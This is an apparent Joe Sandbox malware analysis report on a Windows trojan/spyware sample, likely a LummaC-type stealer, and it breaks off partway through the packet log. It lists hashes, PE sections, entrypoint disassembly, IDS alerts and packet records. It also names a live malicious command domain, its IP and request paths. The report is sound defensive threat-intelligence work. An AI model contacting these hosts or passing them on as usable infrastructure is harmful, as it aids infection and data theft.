https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jowinjoinery.icu	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://jowinjoinery.icu/bdWUa	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jowinjoinery.icu/	file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732071121.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732052923.0000000000A74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jowinjoinery.icu/bdWUate	file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jowinjoinery.icu/bdWUas	file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jowinjoinery.icu/bdWUaq	file.exe, 00000000.00000003.1636635709.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jowinjoinery.icu/Y	file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732071121.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1636635709.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732052923.0000000000A74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jowinjoinery.icu/d	file.exe, 00000000.00000003.1676517185.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jowinjoinery.icu/bdWUa5#Q	file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731493953.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1731882460.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jowinjoinery.icu/bdWUaY:	file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jowinjoinery.icu:443/bdWUa	file.exe, 00000000.00000003.1697028773.00000000009FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.1605408471.000000000582D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv209h	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jowinjoinery.icu/D	file.exe, 00000000.00000003.1757937967.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1758154655.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758913821.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	jowinjoinery.icu	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1634236
Start date and time:	2025-03-10 21:03:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 104.96.149.92, 20.109.210.53, 150.171.27.10
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:05:06	API Interceptor	93x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	ulQGCeP6wq.exe	Get hash	malicious	FormBook	Browse	www.braposaldesk.cyou/a5hz/
	ungziped_file.exe	Get hash	malicious	FormBook	Browse	www.actpisalnplay.cyou/3vjo/
	Payment-031025-pdf.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/jjft/
	F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe	Get hash	malicious	FormBook	Browse	www.shuangunder.shop/udq7/
	jzqc1V4NqB.exe	Get hash	malicious	FormBook	Browse	www.sislieskort.xyz/glm7/?WBuDj=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/oleOey1kataonb6oQhexxcfP9PB04Q==&Jzwht=FNiD
	CjbMEPJZ3J.exe	Get hash	malicious	FormBook	Browse	www.desktitle.homes/izqs/?8v4Hv=cpKH3h&bnb=znOuwYiaskOFcyM/GsSqn0JEMJbSyMHsSdveYB/23/UFYHNBzQzlITz69DD5sgGZofP3y1oDPTsA91VvhFndYIKmLNl26ZFfZBVczyXjFCmbdDFThg==
	rPO-20429124.exe	Get hash	malicious	FormBook	Browse	www.sld6.rest/q0rl/
	r_BBVA_MensajeSWIFT04-03-2025-PDF.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	https://u.to/8eAUIg	Get hash	malicious	HTMLPhisher	Browse	staemconmmuntiy.com/gift/id=746904
	rRFQ24A.exe	Get hash	malicious	FormBook	Browse	www.sld6.rest/q0rl/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jowinjoinery.icu	download.php.exe.bin.exe	Get hash	malicious	Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.104
	Fd-Employee-Handbook(1).pdf	Get hash	malicious	Unknown	Browse	172.64.41.3
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://poshmark-bundle.sale/reit	Get hash	malicious	Unknown	Browse	104.17.245.203
	q2e132qweertgd.exe.bin.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.4.235
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	104.16.145.15
	download.php.exe.bin.exe	Get hash	malicious	Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.95.8
	PatricksParabox.exe.bin.exe	Get hash	malicious	Quasar	Browse	172.67.74.152
	SmartPDFPro.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	tsles(x86).exe	Get hash	malicious	LummaC Stealer	Browse	104.21.93.40

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	tnyg2PUsAn.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	External2.4.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Inst#U0430ll.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Superority.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	tnyg2PUsAn.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	StrikeLeague_Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.903543185534105
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'078'208 bytes
MD5:	5583d74a735a4c65191340fd7a465329
SHA1:	b73bb428cc7c3f2e46400d69b619dd21584667cc
SHA256:	213df7a1f96111ae38d9c4b328acb71945f8f3e71a812be045af646abbe28885
SHA512:	c0e9de25e50853ae026637a26bb8266aa1dcfdd18503f559a56e73d4d5f53445dc2ad7571e31757e533f67769dc31bf1c35ef344152a1102df5697966d93cc5b
SSDEEP:	24576:Wd/g+uGY8Bsg7MOCZ0GeelXozCPoGs7dYtEg7R+W7o5cBIclL/1XgoDAURvscD3A:W3s8BtwOCE+CHlgEW7/LtXD7UyMJg
TLSH:	DCA523E7EAC35601E12D28F10D874282B6A5580D1BA1523FBEDC4C669B1FC7DA4F2F16
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..............................I...........@...........................J....... ...@.................................W...k..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x89e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C9DDEB [Thu Mar 6 17:39:55 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2B4CF5C75Ah
sete byte ptr [edi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov bl, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x1f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x611f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x5f000	0x5f000	90babfe8ee7dc0cf3b5a23af3789bc27	False	0.6009354440789474	data	7.147151884597137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x60000	0x1f0	0x200	7b69929645c85b6e63c5c85a8157a1fe	False	0.630859375	data	4.90871614401785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x61000	0x1000	0x200	f47b289bcee0e13a937cc29db13607bf	False	0.150390625	data	1.0437720338377494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x62000	0x2a2000	0x200	3f365b7f9ad22b37595e9e12a7b0dd58	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
grpnkoxr	0x304000	0x199000	0x198a00	ee940765eb147a90edaaf5d35e9f1e24	False	0.9948958253670848	OpenPGP Public Key	7.954246998260437	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gkiotden	0x49d000	0x1000	0x400	c7f08369d65e376aae8b42912aa1ea93	False	0.8466796875	data	6.425224503524215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x49e000	0x3000	0x2200	a44e32d6cabbb537843b584f98b6bf14	False	0.08076746323529412	DOS executable (COM)	0.924221130466918	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x49c824	0x198	ASCII text, with CRLF line terminators			0.5833333333333334

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-10T21:04:46.737412+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	188.114.97.3	443	TCP
2025-03-10T21:05:09.344558+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	188.114.97.3	443	TCP
2025-03-10T21:05:12.261199+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49714	188.114.97.3	443	TCP
2025-03-10T21:05:15.741968+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	188.114.97.3	443	TCP
2025-03-10T21:05:18.783285+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	188.114.97.3	443	TCP
2025-03-10T21:05:22.636182+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49717	188.114.97.3	443	TCP
2025-03-10T21:05:28.038364+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49718	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 21:04:45.031672001 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:04:45.031717062 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:04:45.031800985 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:04:45.033320904 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:04:45.033337116 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:04:46.737255096 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:04:46.737411976 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:04:46.740966082 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:04:46.740976095 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:04:46.741231918 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:04:46.781495094 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:04:46.793612957 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:04:46.793649912 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:04:46.793732882 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.137039900 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.137197971 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.137250900 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.137268066 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.137296915 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.137341022 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.137346983 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.143820047 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.143867970 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.143888950 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.150558949 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.150604010 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.150629997 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.157489061 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.157511950 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.157556057 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.157582045 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.157636881 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.349101067 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.350974083 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.351013899 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.351306915 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.351463079 CET	443	49708	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.351506948 CET	49708	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.645366907 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.645453930 CET	443	49713	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:07.645518064 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.646284103 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:07.646311998 CET	443	49713	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:09.344422102 CET	443	49713	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:09.344558001 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:09.369853020 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:09.369873047 CET	443	49713	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:09.370242119 CET	443	49713	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:09.372715950 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:09.373083115 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:09.373101950 CET	443	49713	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:09.373147011 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:09.420330048 CET	443	49713	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:10.322992086 CET	443	49713	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:10.323700905 CET	49713	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:10.448913097 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:10.448960066 CET	443	49714	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:10.449151039 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:10.449496984 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:10.449508905 CET	443	49714	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:12.261120081 CET	443	49714	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:12.261198997 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:12.269839048 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:12.269870043 CET	443	49714	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:12.270178080 CET	443	49714	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:12.279221058 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:12.279337883 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:12.279386044 CET	443	49714	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:12.279547930 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:12.279558897 CET	443	49714	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:13.527307034 CET	443	49714	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:13.527784109 CET	49714	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:13.800884962 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:13.800936937 CET	443	49715	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:13.805881977 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:13.806329966 CET	49715	443	192.168.2.5	188.114.97.3
Mar 10, 2025 21:05:13.806341887 CET	443	49715	188.114.97.3	192.168.2.5
Mar 10, 2025 21:05:15.741892099 CET	443	49715	188.114.97.3	192.168.2.5
